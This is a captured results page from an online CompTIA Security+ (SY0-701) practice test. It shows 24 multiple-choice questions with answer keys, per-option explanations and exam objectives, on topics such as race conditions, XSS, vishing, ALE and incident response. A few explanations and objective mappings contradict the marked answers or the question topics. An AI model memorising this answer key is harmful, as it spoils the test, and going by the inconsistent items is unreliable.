https://www.udemy.com/course/comptia-security-sy0-701-practice-tests/learn/quiz/6110330#content
CompTIA Security+ (SYO-701) – Results
Back to result overview
Attempt 1
All domains
- 90 all
- 0 correct
- 0 incorrect
- 90 skipped
- 0 marked
Collapse all questions
Question 1Skipped
A medium-sized bank has an online portal where customers may place standing orders and schedules to transfer their funds. A malicious attacker exploits a vulnerability in the application to initiate unauthorized overdrafts. The application performs a verification of the account balance when the transfer is set but it fails to validate and recheck it at the time of the execution. What security vulnerability is illustrated by this scenario?
Weak encryption
Explanation
Weak encryption would involve the inadequate protection of sensitive data through encryption algorithms. While encryption is important for securing data, the vulnerability in this scenario is not related to the strength of encryption used in the application.
Input validation
Explanation
Input validation refers to the process of ensuring that data entered into a system meets specific criteria before it is processed. In this scenario, the issue is not related to the validation of user input, but rather the lack of revalidation of account balances at the time of execution.
Correct answer
Race condition
Explanation
A race condition occurs when the outcome of a system’s operation is dependent on the sequence or timing of other uncontrollable events. In this scenario, the lack of revalidation of the account balance at the time of execution creates a race condition where the attacker can exploit the vulnerability to initiate unauthorized overdrafts.
Default settings
Explanation
Default settings typically refer to the pre-configured settings of a system or application. In this case, the vulnerability does not stem from default settings, but rather from the lack of rechecking the account balance at the time of fund transfer execution.
Overall explanation
2.3 Explain various types of vulnerabilities.
The application running on the online portal has a race condition vulnerability. When the behavior of a system or application is dependent on the relative timing of events, race conditions may occur. The attacker maliciously schedules a fund transfer when there is an available balance, however, depletes the account funds before the execution of the scheduled fund transfer and exploits the time difference between the checking and execution. The vulnerability is also known as the time-of-check time-of-use (TOC-TOU) race condition.
Domain
2.0 Threats, Vulnerabilities, and Mitigations
Question 2Skipped
What should be primarily considered during the approval of a business process change where a new software application being implemented shall introduce changes to the security infrastructure that currently exists?
To make sure that the changes happen within the timelines
Explanation
While meeting timelines is important for the implementation of a new software application, it is not the primary consideration when approving a business process change that involves changes to the security infrastructure. Security should always take precedence over timelines to prevent potential security risks.
To find a way to reduce the overall budget
Explanation
While budget considerations are important in any business process change, reducing the overall budget should not be the primary focus when approving changes that impact the security infrastructure. Security measures are essential for protecting sensitive data and preventing security breaches.
To facilitate training to all users of the application
Explanation
Providing training to users of the new software application is important for ensuring proper usage and maximizing the benefits of the system. However, facilitating training should not be the primary consideration when approving a business process change that involves security infrastructure changes. Security alignment and compliance should be the main focus in such cases.
Correct answer
There should be alignment with security policies and standards
Explanation
It is crucial to ensure that any business process change aligns with the organization’s security policies and standards to maintain the integrity and confidentiality of data. This helps in preventing security vulnerabilities and ensuring compliance with regulatory requirements.
Overall explanation
1.3 Explain the importance of change management processes and the impact to security.
The primary consideration during the approval stage of a new business process is that there should be alignment with security policies and standards. This helps to maintain the organization’s security posture.
Domain
1.0 General Security Concepts
Question 3Skipped
An insurance company has developed a set of guidelines for its employees to follow as they deal with their clients’ subscriptions. Which of the following best describes the aim of having guidelines?
Correct answer
Instructions on how to safeguard the data
Explanation
Guidelines are put in place to provide instructions on how to safeguard sensitive data and ensure that employees handle client subscriptions securely. By following these guidelines, employees can protect the confidentiality, integrity, and availability of the data they work with.
Enforcing penalties for violators
Explanation
While guidelines may include information on penalties for violating security policies, the primary aim of having guidelines is not to enforce penalties. The main focus is on providing clear instructions and best practices for employees to follow in order to maintain security.
Framework for securing the organization
Explanation
Guidelines serve as a framework for securing the organization by outlining the necessary steps and procedures to protect data and prevent security incidents. They provide a structured approach to implementing security measures and ensuring compliance with security standards.
Delegation of security responsibilities
Explanation
Guidelines do not necessarily involve the delegation of security responsibilities. Instead, they provide employees with the knowledge and tools they need to fulfill their security responsibilities effectively. Delegation of security responsibilities may be addressed through organizational roles and responsibilities, but guidelines focus on providing guidance and best practices.
Overall explanation
5.1 Summarize elements of effective security governance.
Guidelines can provide the employees of the insurance company with instructions on how to safeguard the data. Guidelines are created typically to give the employees practical and clear instructions on the ways they should handle sensitive data to maintain security.
Domain
5.0 Security Program Management and Oversight
Question 4Skipped
The security team has lately noticed an increase in false positives that is impacting the efficiency of their intrusion detection system that monitors the network for security threats. What can they consider implementing to improve the accuracy of the device?
Correct answer
Anomaly detection and behavior analysis
Explanation
Implementing anomaly detection and behavior analysis can significantly improve the accuracy of the intrusion detection system by focusing on deviations from normal patterns. This approach can help in distinguishing between legitimate network activity and potential security threats, thereby reducing false positives and enhancing overall detection capabilities.
Reducing the number of devices being monitored
Explanation
Reducing the number of devices being monitored could potentially lessen the burden on the intrusion detection system, but it may not necessarily improve the accuracy in terms of reducing false positives. Limiting the scope of monitoring may lead to overlooking potential threats on other devices.
Adding a span port to the traffic path
Explanation
Adding a span port to the traffic path can enhance visibility into network traffic, but it may not directly solve the problem of false positives. While it can provide more data for analysis, it does not inherently address the root cause of the accuracy issues in the intrusion detection system.
Daily searching for new signatures
Explanation
Daily searching for new signatures may help in keeping the intrusion detection system up-to-date with the latest threats, but it may not directly address the issue of false positives. While it is important for threat intelligence, it may not be the most effective solution for reducing false alarms.
Overall explanation
4.5 Given a scenario, modify enterprise capabilities to enhance security.
To improve the accuracy of their intrusion detection system, the security team can implement anomaly detection and behavior analysis. In this method, abnormal attack patterns that do not exhibit a known or defined signature may be detected and aid in the reduction of false positives.
Domain
4.0 Security Operations
Question 5Skipped
A large e-commerce website has turned to load balancing to help ease off recent surges in traffic during holiday sales. What do they expect from the load-balancing setup?
To block malicious traffic entering the network
Explanation
While load balancing can help mitigate DDoS attacks by distributing traffic across multiple servers, its primary function is not to block malicious traffic entering the network. This is typically handled by other security measures such as firewalls and intrusion detection systems.
To monitor the performance of the incoming traffic
Explanation
Monitoring the performance of incoming traffic is not the primary function of load balancing. While load balancers can provide some performance metrics, their main role is to evenly distribute traffic across servers to optimize resource utilization and improve user experience.
Correct answer
To distribute incoming traffic evenly across multiple web servers
Explanation
The main goal of a load-balancing setup is to distribute incoming traffic evenly across multiple web servers. This helps improve the website’s performance, scalability, and availability by preventing any single server from becoming overwhelmed with traffic.
To authenticate the packets as the enter the network
Explanation
Load balancing is not responsible for authenticating packets as they enter the network. Its main purpose is to evenly distribute incoming traffic across multiple servers to improve performance and reliability.
Overall explanation
3.4 Explain the importance of resilience and recovery in security architecture.
The large e-commerce website expects to distribute incoming traffic evenly across multiple web servers from the load-balancing setup. The configuration enhances the performance of the server and ensures high availability by preventing an overloading of resources on a single server.
Domain
3.0 Security Architecture
Question 6Skipped
The security manager at a corporate institution is responsible for the vendor selection process to provide cybersecurity training for the employees. What action should the security manager take once he discovers that his uncle is one of the vendors being considered for the job?
Reject participating in the vendor selection process without any explanations
Explanation
Rejecting participation in the vendor selection process without any explanations may raise suspicions and questions about the security manager’s motives. Transparency and honesty are crucial in such situations to maintain the integrity of the selection process.
Proceed with the vendor selection process without disclosing the relationship
Explanation
Proceeding with the vendor selection process without disclosing the relationship with the vendor may lead to conflicts of interest and bias in the decision-making process. It is essential to disclose any personal relationships that may influence the selection to ensure fairness and impartiality.
Make sure that his uncle is the selected vendor because their family
Explanation
Selecting the vendor based on a family relationship without considering other factors such as qualifications, expertise, and cost-effectiveness may not be in the best interest of the corporate institution. It is important to prioritize the organization’s cybersecurity needs and choose the most suitable vendor based on merit.
Correct answer
Disclose the relationship to the vendor selection committee
Explanation
Disclosing the relationship to the vendor selection committee is the most appropriate course of action in this scenario. Transparency about the personal connection with the vendor allows the committee to assess the situation objectively and make an informed decision based on all relevant factors. This helps to maintain the integrity of the selection process and avoid any conflicts of interest.
Overall explanation
5.3 Explain the processes associated with third-party risk assessment and management.
The security manager should disclose the relationship to the vendor selection committee. The current situation involves a conflict of interest, and it is therefore necessary to observe proper ethical conduct, transparency, and fairness to protect the integrity of the vendor selection process.
Domain
5.0 Security Program Management and Oversight
Question 7Skipped
Employees at a company have received phone calls from individuals claiming to be the technical support staff requesting usernames and passwords for critical security upgrades tied down to individual user accounts. What type of social engineering attack are they being subjected to?
Instashing
Explanation
Instashing is not a recognized term in the context of social engineering attacks. It does not relate to the scenario described where individuals are being targeted through phone calls to obtain usernames and passwords for security upgrades.
Correct answer
Vishing
Explanation
Vishing, or voice phishing, is a type of social engineering attack where attackers use phone calls to trick individuals into providing sensitive information such as usernames and passwords. In this scenario, the employees are being targeted through phone calls by individuals claiming to be technical support staff, making it a classic example of a vishing attack.
Smishing
Explanation
Smishing is a type of phishing attack that involves sending text messages to trick individuals into revealing sensitive information. While similar to vishing, smishing specifically refers to attacks conducted through SMS or text messages, not phone calls as described in the scenario.
Spear phishing
Explanation
Spear phishing is a type of phishing attack that targets specific individuals or organizations with personalized messages to trick them into revealing sensitive information such as usernames and passwords. While similar to the scenario described, spear phishing typically involves email communication rather than phone calls.
Overall explanation
2.2 Explain common threat vectors and attack surfaces.
The employees at the company are being subjected to a vishing social engineering attack. Vishing stands for voice phishing. The attackers have resorted to voice communications in their attempt to socially engineer their way into receiving the usernames and passwords of users at the company.
Domain
2.0 Threats, Vulnerabilities, and Mitigations
Question 8Skipped
A small-sized business venture has opted to use a self-signed SSL certificate due to budget constraints to secure the traffic between its web server and clients. What is the major security concern for such a decision?
Reduced key strength for the encryption
Explanation
Using a self-signed SSL certificate does not necessarily mean reduced key strength for encryption. The key strength is determined by the encryption algorithm and key length chosen during the certificate generation process, which can still be strong even with a self-signed certificate.
Correct answer
An increased risk of man-in-the-middle attacks
Explanation
The major security concern with using a self-signed SSL certificate is the increased risk of man-in-the-middle attacks. Since self-signed certificates are not verified by a trusted third-party certificate authority, attackers can potentially intercept and modify the communication between the web server and clients without detection.
Certificate errors on the browser causing doubts
Explanation
While certificate errors on the browser may occur when using a self-signed SSL certificate, causing doubts for users, this is not the major security concern. Users can still choose to proceed with the connection despite the certificate warning.
Increased volume of traffic
Explanation
Using a self-signed SSL certificate does not directly impact the volume of traffic. The concern lies more in the security of the communication channel rather than the amount of traffic being transmitted.
Overall explanation
1.4 Explain the importance of using appropriate cryptographic solutions.
The major security concern for the business venture using self-signed SSL certificates is an increased risk of man-in-the-middle attacks. Since the certificate has not been verified by a trusted third party any attacker could likewise forge and use their own unverified certificate. Although it provides encryption it does not have the validation and trust provided by a recognized certificate authority (CA).
Domain
1.0 General Security Concepts
Question 9Skipped
A cloud storage service provider is assessing the financial impact of a security breach that leads to the theft of stored customer data. They have estimated the cost of such a breach to be $1 million and the probability that such a breach could occur within a period of a year to be 10%. What is the ALE?
$10 million
Explanation
The Annual Loss Expectancy (ALE) is not calculated by simply multiplying the cost of the breach by 10%. The correct calculation is $1 million cost multiplied by 10% probability, resulting in $100,000, not $10 million.
Correct answer
$100,000
Explanation
The correct calculation for the Annual Loss Expectancy (ALE) in this scenario is $1 million cost multiplied by 10% probability, resulting in $100,000. This is the accurate estimation of the financial impact of the security breach.
$1 million
Explanation
The Annual Loss Expectancy (ALE) is not equal to the cost of the security breach. It is the product of the cost of the breach and the probability of it occurring within a year. In this case, the ALE is $100,000, not $1 million.
$10,000
Explanation
The Annual Loss Expectancy (ALE) is a crucial metric in risk assessment that combines the potential financial impact of a security breach with the likelihood of it happening. In this case, multiplying the $1 million cost of the breach by the 10% probability results in an ALE of $100,000.
Overall explanation
5.2 Explain elements of the risk management process.
The annualized loss expectancy (ALE) is $100,000. The annualized loss expectancy is taken as a product of the single loss expectancy (SLE) i.e., $1 million, and annualized rate of occurrence (ARO) i.e., 10%.
ALE = SLE x ARO = $1,000,000 x 0.10 =$100,000
Domain
5.0 Security Program Management and Oversight
Question 10Skipped
A malicious user has injected a script into the comment section of a vulnerable web application that allows users to post their comments on a blog. When the comment is viewed on the blog by other users, it executes unauthorized activity on the browser of the viewer. What vulnerability is the website susceptible to?
XSRF
Explanation
XSRF (Cross-Site Request Forgery) vulnerability involves tricking a user into performing unintended actions on a web application where they are authenticated. It does not directly relate to injecting scripts into web applications to execute unauthorized activities on browsers.
SSRF
Explanation
SSRF (Server-Side Request Forgery) vulnerability allows attackers to make requests from the server to other resources on the internet, potentially leading to unauthorized access to internal systems or sensitive data. It is not directly related to injecting scripts into web applications to execute unauthorized activities on browsers.
XXE
Explanation
XXE (XML External Entity) vulnerability is related to parsing XML input from untrusted sources, allowing attackers to access sensitive data or execute arbitrary code. It is not directly related to injecting scripts into web applications to execute unauthorized activities on browsers.
Correct answer
XSS
Explanation
XSS (Cross-Site Scripting) vulnerability occurs when an attacker injects malicious scripts into web applications, which are then executed on the browsers of other users. This vulnerability allows attackers to steal sensitive information, manipulate website content, or perform unauthorized actions on behalf of the user.
Overall explanation
2.3 Explain various types of vulnerabilities.
The website is affected by a cross-site scripting (XSS) vulnerability. The weakness allows untrusted data to be included in the webpage due to a lack of proper input handling, which in turn allows the attacker to execute harmful scripts in the application in the context of other users.
Domain
2.0 Threats, Vulnerabilities, and Mitigations
Question 11Skipped
What is the most relevant security consideration for a manufacturing company utilizing embedded systems to control its critical processes such as temperature and pressure regulation?
Real-time threat detection using antivirus software
Explanation
Real-time threat detection using antivirus software is essential for protecting against malware and other malicious software, but it may not be the most relevant security consideration for embedded systems in a manufacturing company where firmware vulnerabilities can pose a greater risk.
Correct answer
Patching vulnerabilities affecting the system’s firmware
Explanation
Patching vulnerabilities affecting the system’s firmware is the most relevant security consideration for a manufacturing company utilizing embedded systems to control critical processes. Firmware vulnerabilities can be exploited by attackers to gain unauthorized access or disrupt operations, making timely patching essential for maintaining the security of the systems.
Physically securing the equipment housing the embedded systems
Explanation
Physically securing the equipment housing the embedded systems is a crucial security consideration for a manufacturing company as it helps prevent unauthorized physical access to the systems, which can lead to tampering or sabotage of critical processes.
Monitoring network traffic using an intrusion detection system
Explanation
Monitoring network traffic using an intrusion detection system is important for overall network security, but it may not directly address the security considerations specific to embedded systems controlling critical processes in a manufacturing environment.
Overall explanation
4.6 Given a scenario, implement and maintain identity and access management.
The most relevant security consideration for the embedded systems being utilized is patching vulnerabilities affecting the system’s firmware. The updates should be applied regularly to continuously provide protection against known security issues.
Domain
4.0 Security Operations
Question 12Skipped
What type of test can an organization perform to validate that their critical web application can maintain service availability in the event normal service operation is interrupted?
Simulation
Explanation
Simulation involves creating a virtual environment to mimic real-world scenarios and test the behavior of systems and applications. While simulation can be useful for testing various aspects of a web application, it may not accurately reflect the actual performance and availability of the application during an interruption of normal service operation.
Tabletop exercises
Explanation
Tabletop exercises are used to simulate various scenarios and test the organization’s response to them. While they are valuable for testing incident response and decision-making processes, they do not directly validate the ability of a critical web application to maintain service availability in the event of an interruption.
Parallel processing
Explanation
Parallel processing involves breaking down tasks into smaller subtasks that can be executed simultaneously to improve performance. While parallel processing can enhance the efficiency of processing tasks, it is not directly related to testing the ability of a critical web application to maintain service availability during interruptions in normal service operation.
Correct answer
Fail-over
Explanation
Fail-over testing is specifically designed to validate the ability of a critical web application to maintain service availability in the event normal service operation is interrupted. This type of test involves intentionally triggering a failure or interruption and verifying that the application can seamlessly switch to a backup system or component to continue providing service.
Overall explanation
3.4 Explain the importance of resilience and recovery in security architecture.
The organization can perform a fail-over test to validate that service availability can be maintained by its critical web application when normal service operations are interrupted. This helps the organization to ensure the continuity and resilience of its operations by confirming the system’s ability to provide uninterrupted services.
Domain
3.0 Security Architecture
Question 13Skipped
During a severe winter storm, a data center experienced a sudden power outage. How does a UPS serve the data center in such a situation?
Correct answer
Protects critical equipment from power disruptions
Explanation
This choice is correct because the main purpose of a UPS is to protect critical equipment from power disruptions. A UPS acts as a buffer between the main power source and the equipment, providing a continuous power supply during outages or fluctuations to prevent data loss or damage to hardware.
Automatically switch on the backup generators
Explanation
Automatically switching on backup generators is not the primary function of a UPS (Uninterruptible Power Supply). While some data centers may have this setup, the main purpose of a UPS is to provide temporary power to critical equipment during power outages or disruptions until the generators kick in.
Alert administrators of the power outage
Explanation
Alerting administrators of a power outage is not a direct function of a UPS. While some UPS systems may have monitoring capabilities to send alerts, the primary role of a UPS is to ensure uninterrupted power supply to critical equipment, rather than notifying administrators of power issues.
Distribute the power evenly through the data center
Explanation
Distributing power evenly through the data center is not the primary function of a UPS. While a UPS helps regulate power and prevent disruptions, its main purpose is to provide a temporary power source during outages, rather than managing power distribution within the data center.
Overall explanation
3.4 Explain the importance of resilience and recovery in security architecture.
An uninterruptible power supply (UPS) protects critical equipment from power disruptions. UPS units can provide battery power temporarily to keep the critical equipment up and running during unexpected power outages to allow a safe and orderly transition of the power source to either a generator or the like. They close the gap between the power outage and the startup of the backup power supplies.
Domain
3.0 Security Architecture
Question 14Skipped
Why should a multinational corporation implement geographic restrictions in its data security policies as it operates across borders and regions?
Reduction of data transfer costs across borders
Explanation
Implementing geographic restrictions in data security policies may not necessarily reduce data transfer costs across borders. While it may indirectly impact data transfer by limiting where data can be accessed from, the primary purpose of geographic restrictions is not cost reduction.
Correct answer
Compliance with varying data protection regulations
Explanation
Implementing geographic restrictions in data security policies is crucial for multinational corporations to comply with varying data protection regulations across different borders and regions. By restricting data access based on geographic locations, organizations can ensure compliance with local laws and regulations regarding data privacy and security.
Improvement in the network speed and performance
Explanation
Implementing geographic restrictions in data security policies may not directly improve network speed and performance. While it may impact network traffic by limiting access to certain regions, the main goal of geographic restrictions is not focused on network optimization.
Limiting the access to the sensitive data
Explanation
Implementing geographic restrictions in data security policies is essential for limiting access to sensitive data based on geographical locations. By restricting access to sensitive information to specific regions, organizations can reduce the risk of unauthorized access and data breaches.
Overall explanation
3.3 Compare and contrast concepts and strategies to protect data.
A multinational corporation should implement geographic restrictions in its data security policies to ensure compliance with varying data protection regulations. Such regulations state how the data should be stored, and transmitted, the strength of the encryption, who is allowed to access the data, processing standards, and likewise.
Domain
3.0 Security Architecture
Question 15Skipped
A cybersecurity technician has noticed abnormal login patterns consisting of multiple failed trials from several user accounts with different source IP addresses. How does a SIEM system help the technician?
Triggering of an immediate incident response action
Explanation
Triggering of an immediate incident response action is not a direct function of a SIEM system. A SIEM system can help detect and alert on potential security incidents, but the actual incident response actions would need to be initiated by the cybersecurity team based on the information provided by the SIEM.
Correct answer
Log analysis and generation of alerts
Explanation
Log analysis and generation of alerts is a key function of a SIEM system. A SIEM system collects and analyzes log data from various sources, including failed login attempts, to identify potential security incidents. By generating alerts based on abnormal patterns, the system helps the cybersecurity technician identify and respond to potential threats in a timely manner.
Automatically blocking suspicious IP addresses
Explanation
Automatically blocking suspicious IP addresses is not a direct function of a SIEM system. While a SIEM system can help detect and analyze abnormal login patterns, the actual blocking of IP addresses would typically be handled by a firewall or other security control.
Perform user account verification and validation
Explanation
Performing user account verification and validation is not a primary function of a SIEM system. While a SIEM system can help monitor user activity and detect abnormal patterns, the verification and validation of user accounts would typically be handled by identity and access management systems.
Overall explanation
4.4 Explain security alerting and monitoring concepts and tools.
Log analysis and generation of alerts are achieved by the security information and event management (SIEM) system. The SIEM primarily performs the aggregation and correlation of security logs. It is capable of recognizing abnormal patterns from the log data such as multiple failed login attempts and can notify the cybersecurity team of potential security incidents via alerts.
Domain
4.0 Security Operations
Question 16Skipped
A business firm has experienced a data breach causing them to activate their incident response plan. What is the role of incident response policies in this situation?
To prevent an incident from happening in the future
Explanation
Incident response policies are reactive measures that help organizations respond to security incidents after they have occurred. They are not intended to prevent incidents from happening in the future. Prevention measures are typically addressed through proactive security measures and policies.
To find out who is to blame for the incident
Explanation
While it may be important to identify the root cause of a security incident, incident response policies are primarily focused on containing and mitigating the incident, rather than assigning blame to individuals or departments within the organization.
Correct answer
To restore normal operations and reduce the impact of the incident
Explanation
Incident response policies are put in place to guide the organization in effectively responding to and recovering from security incidents. The primary goal of these policies is to restore normal operations as quickly as possible and minimize the impact of the incident on the business.
To be able to present legal documents to authorities when questioned
Explanation
Incident response policies are not designed to provide legal documentation or evidence to authorities. While incident response plans may include steps for reporting incidents to appropriate authorities, their main purpose is to guide the organization in responding to and recovering from security incidents.
Overall explanation
5.1 Summarize elements of effective security governance.
The role of the incident response policies is to restore normal operations and reduce the impact of the incident. They provide a structured framework for how the organization should respond, manage, and recover from the security incidents such as data breaches.
Domain
5.0 Security Program Management and Oversight
Question 17Skipped
A company is obliged to retain its customer’s data for a minimum of three years as per the new governing regulations. What is the purpose of a data retention policy for this company?
To reduce the costs of storage
Explanation
A data retention policy is not primarily designed to reduce the costs of storage. While it may indirectly impact storage costs by defining what data needs to be retained and for how long, the main purpose is to ensure compliance with regulations and protect customer data privacy.
To ensure that data is always deleted
Explanation
The purpose of a data retention policy is not to ensure that data is always deleted. On the contrary, it specifies how long data should be retained to comply with regulations and legal requirements. Deleting data without following the policy could lead to non-compliance issues.
To create laws for data collection
Explanation
A data retention policy is not about creating laws for data collection. It is about setting guidelines within the organization on how long data should be kept, how it should be stored, and when it should be securely disposed of. Compliance with existing regulations is the main focus.
Correct answer
To comply with regulations and ensure privacy
Explanation
The correct choice. A data retention policy is essential for companies to comply with regulations and ensure the privacy of customer data. By defining how long data should be retained, who has access to it, and how it should be securely disposed of, the company can avoid legal penalties and protect sensitive information.
Overall explanation
4.2 Explain the security implications of proper hardware, software, and data asset management.
The data retention policy is used by the company to comply with regulations and ensure privacy by defining how long the data should be retained. Clear guidelines of the way the organization should manage and retain its data over time are established by the policy.
Domain
4.0 Security Operations
Question 18Skipped
A security administrator has initiated an investigation on a workstation that is suspected to be compromised after observing unusual network behavior originating from it. What action should be taken?
Initiate a full backup of the data in the workstation
Explanation
Although backups are important, initiating one during an active investigation could inadvertently capture malware or other malicious elements along with legitimate data. Additionally, it could alter or overwrite important forensic data, making it difficult to analyze the compromise. The focus should first be on isolating the threat and conducting a forensic analysis before considering backup options.
Disconnect the workstation from the network
Explanation
While disconnecting the workstation can effectively stop suspicious activity, it also eliminates the ability to monitor real-time behavior and network traffic, which may be essential for forensic analysis. Sudden disconnection may alert the attacker that the workstation has been identified, potentially prompting them to delete logs or further obscure their activity. It is a more abrupt measure compared to quarantine, which allows for a more systematic investigation.
Reset the workstation to factory settings
Explanation
Resetting the workstation should be a last resort after the investigation is complete. While this action would remove any malware or unauthorized access, it also destroys crucial forensic evidence that may be needed to understand the nature of the compromise, how it occurred, and its full scope. Prematurely wiping the system could prevent identifying other infected systems or the attack vector.
Correct answer
Place the workstation in a quarantine network segment
Explanation
Quarantining the workstation by placing it in a separate network segment helps to isolate the threat while maintaining connectivity for further investigation. This approach prevents the spread of malware or unauthorized access across the broader network, while still allowing investigators to monitor and collect data for analysis. It is a controlled method of containment that minimizes disruption to the overall environment and avoids the risk of tampering with evidence.
Overall explanation
4.4 Explain security alerting and monitoring concepts and tools.
The security administrator should place the workstation in a quarantine network segment. The possible spread of malware and other threats across the network is prevented by the isolation of the device from the rest of the network in the quarantine.
Domain
4.0 Security Operations
Question 19Skipped
An attacker has managed to exploit a vulnerability on one of the virtual machines in an organization employing virtualization technology due to the virtual machine having an outdated and unpatched operating system. What is the most pressing security risk in this scenario?
Persistent access to the affected virtual machine
Explanation
Persistent access to the affected virtual machine is a security risk, but it is not as critical as the risk of unauthorized access to the hypervisor. While persistent access can lead to further exploitation and data exfiltration, unauthorized access to the hypervisor poses a more immediate and widespread threat to the organization’s virtual environment.
Disruption of services running on the compromised virtual machine
Explanation
While the disruption of services running on the compromised virtual machine is a concern, it is not as critical as the risk of unauthorized access to the hypervisor. Disruption of services can be mitigated by isolating the affected virtual machine, but unauthorized access to the hypervisor poses a much larger threat.
Correct answer
Unauthorized access to the hypervisor
Explanation
The most pressing security risk in this scenario is the unauthorized access to the hypervisor. If an attacker gains access to the hypervisor, they can potentially compromise all virtual machines running on the host, leading to a widespread security breach within the organization.
Compromised data within the affected virtual machine
Explanation
Compromised data within the affected virtual machine is a significant concern, but it is not the most pressing security risk in this scenario. Data within the virtual machine can potentially be recovered or restored, whereas unauthorized access to the hypervisor can lead to more severe consequences for the entire virtual environment.
Overall explanation
2.3 Explain various types of vulnerabilities.
The most pressing security risk is unauthorized access to the hypervisor. From a successful virtual machine escape, an attacker can manage to compromise the hypervisor layer that controls all the virtual machines on the physical server. Such a security breach puts all virtual machines and the physical host at risk of exploitation.
Domain
2.0 Threats, Vulnerabilities, and Mitigations
Question 20Skipped
A security specialist has deployed honeytokens in a server’s file system to help detect unauthorized access to sensitive data. Which of the following best illustrates what a honeytoken is?
A security token generator to create passwords
Explanation
A security token generator is a tool used to create secure authentication tokens or passwords for users. While this tool enhances security, it is not the same as a honeytoken, which is used as a deception technique to detect unauthorized access.
Correct answer
Fictitious data entry designed to trigger alerts
Explanation
A honeytoken is a type of fictitious data entry or file that is intentionally placed in a system to act as a decoy for potential attackers. When unauthorized access occurs and the honeytoken is accessed, it triggers an alert, indicating a security breach.
Network traffic captured by a sniffing tool
Explanation
Network traffic captured by a sniffing tool is related to network monitoring and analysis, not honeytokens. Honeytokens are specifically designed to detect unauthorized access to sensitive data by acting as bait for attackers, triggering alerts when accessed.
One time session tokens to determine session hijacks
Explanation
One-time session tokens are used to authenticate and authorize users for a single session or transaction. They are not related to honeytokens, which are specifically designed to detect unauthorized access by acting as bait for attackers.
Overall explanation
1.2 Summarize fundamental security concepts.
A honeytoken is a fictitious data entry designed to trigger alerts. They are a way to spot attackers on the network by intentionally being placed to detect unauthorized access or data breaches. Any attempt that is made to access a honeytoken will trigger an alert and indicate a potential security incident has occurred.
Domain
1.0 General Security Concepts
Question 21Skipped
Which of the following options best represents a physical security control for a technology firm interested in upgrading the access controls to their data center?
Encrypting the data on the access control server
Explanation
Encrypting the data on the access control server is a data security measure rather than a physical control. Data encryption protects the confidentiality of information stored on the server, but it does not directly address physical access to the data center itself.
Updating the data center access control policies
Explanation
Updating the data center access control policies is a procedural security measure rather than a physical control. While important for overall security, access control policies dictate who can access the data center and under what conditions, but they do not physically restrict access.
Correct answer
Fingerprint scanners at the entrance
Explanation
Fingerprint scanners at the entrance are a physical security control measure that can restrict access to the data center based on biometric identification. This control ensures that only authorized individuals with registered fingerprints can enter the data center, enhancing overall security.
Installing antivirus software on the access control server
Explanation
Installing antivirus software on the access control server is a cybersecurity measure rather than a physical security control. Antivirus software is designed to detect and remove malware from systems, but it does not directly address physical access to the data center.
Overall explanation
1.1 Compare and contrast various types of security controls.
Fingerprint scanners at the entrance best represent a physical security control for a technology firm interested in upgrading the access controls to their data center. Physical security controls are designed to protect physical assets such as buildings, data centers, and infrastructure from unauthorized access, theft, or vandalism.
Domain
1.0 General Security Concepts
Question 22Skipped
Which protocol should be implemented to ensure the confidentiality and integrity of email communication?
SSH
Explanation
SSH (Secure Shell) is a network protocol that provides secure access to a remote system. While SSH is commonly used for secure remote access and file transfers, it is not specifically designed for securing email communication. TLS (Transport Layer Security) is the more appropriate protocol for ensuring the confidentiality and integrity of email communication.
SNMP
Explanation
SNMP (Simple Network Management Protocol) is used for network management and monitoring, and it is not designed to ensure the confidentiality and integrity of email communication. SNMP is used for collecting and organizing information about devices on a network, not for securing email communications.
Correct answer
TLS
Explanation
TLS (Transport Layer Security) is the correct choice for ensuring the confidentiality and integrity of email communication. TLS is a cryptographic protocol that encrypts data transmitted over a network, providing secure communication channels for email services. By implementing TLS, email communication can be protected from eavesdropping and tampering.
FTP
Explanation
FTP (File Transfer Protocol) is not the correct choice for ensuring the confidentiality and integrity of email communication. FTP is primarily used for transferring files between a client and a server, and it does not provide encryption or security features for email communication.
Overall explanation
4.1 Given a scenario, apply common security techniques to computing resources.
Transport layer security (TLS) should be implemented to ensure the confidentiality and integrity of email communication. TLS uses certificates to encrypt the communications making it practically impossible for an attacker in the middle of the communication between the sender and the receiver to make out any sense of the data without the private key of the receiver, which is kept safe and secured at the receiver’s end.
Domain
4.0 Security Operations
Question 23Skipped
Which of the following measures best aligns with national privacy requirements aimed at improving data security and safeguarding the citizens’ personal information?
Correct answer
Encrypting the data at rest and in transit
Explanation
Encrypting data at rest and in transit is a measure that directly aligns with national privacy requirements aimed at improving data security and safeguarding citizens’ personal information. Encryption helps protect data from unauthorized access and ensures that sensitive information remains confidential.
Selling the data to generate income to purchase security tools
Explanation
Selling data to generate income for purchasing security tools may be a valid business strategy, but it does not directly align with national privacy requirements aimed at improving data security and safeguarding citizens’ personal information. Selling data may compromise privacy and security.
Sharing the data with foreign allies to strengthen relationships
Explanation
Sharing data with foreign allies may have diplomatic benefits, but it does not directly align with national privacy requirements aimed at improving data security and safeguarding citizens’ personal information. In fact, sharing data with foreign entities may raise concerns about data privacy and security.
Storing the data forever to achieve a historical feat
Explanation
Storing data forever does not align with national privacy requirements aimed at improving data security and safeguarding citizens’ personal information. Keeping data indefinitely increases the risk of data breaches and unauthorized access, leading to privacy concerns and potential security vulnerabilities.
Overall explanation
5.4 Summarize elements of effective security compliance.
Encrypting the data at rest and in transit best aligns with national privacy requirements aimed at improving data security and safeguarding the citizens’ personal information. It is a widely accepted practice that does not compromise the privacy of the data it’s protecting.
Domain
5.0 Security Program Management and Oversight
Question 24Skipped
What aspect of business continuity policies should be prioritized by a large software development firm that wants to ensure that unforeseen disruptions will not affect its project repositories and development environments housed in its data center infrastructure?
Secure code training
Explanation
Secure code training is essential for improving the security of software applications, but it is not directly related to ensuring business continuity in the event of disruptions affecting project repositories and development environments in the data center infrastructure.
Physical access to the project room
Explanation
Physical access to the project room is important for security purposes, but it does not address the overall business continuity needs of the software development firm, particularly in relation to protecting project repositories and development environments in the data center infrastructure during unforeseen disruptions.
Contact numbers of project developers
Explanation
Contact numbers of project developers are important for communication during disruptions, but they do not directly address the protection and recovery of project repositories and development environments in the data center infrastructure.
Correct answer
Data backup and recovery procedures
Explanation
Data backup and recovery procedures are crucial for ensuring that project repositories and development environments can be restored in case of unforeseen disruptions. Prioritizing this aspect of business continuity policies will help the software development firm maintain continuity and protect its critical assets.
Overall explanation
5.1 Summarize elements of effective security governance.
The software development firm should prioritize data backup and recovery procedures to ensure that unforeseen disruptions will not affect its project repositories and development environments housed in its data center infrastructure. Backing up the data ensures that there is a redundant storage of the important information. Successful recovery procedures guarantee that the data that has been backed up can be restored and used at some point later in time.
Domain
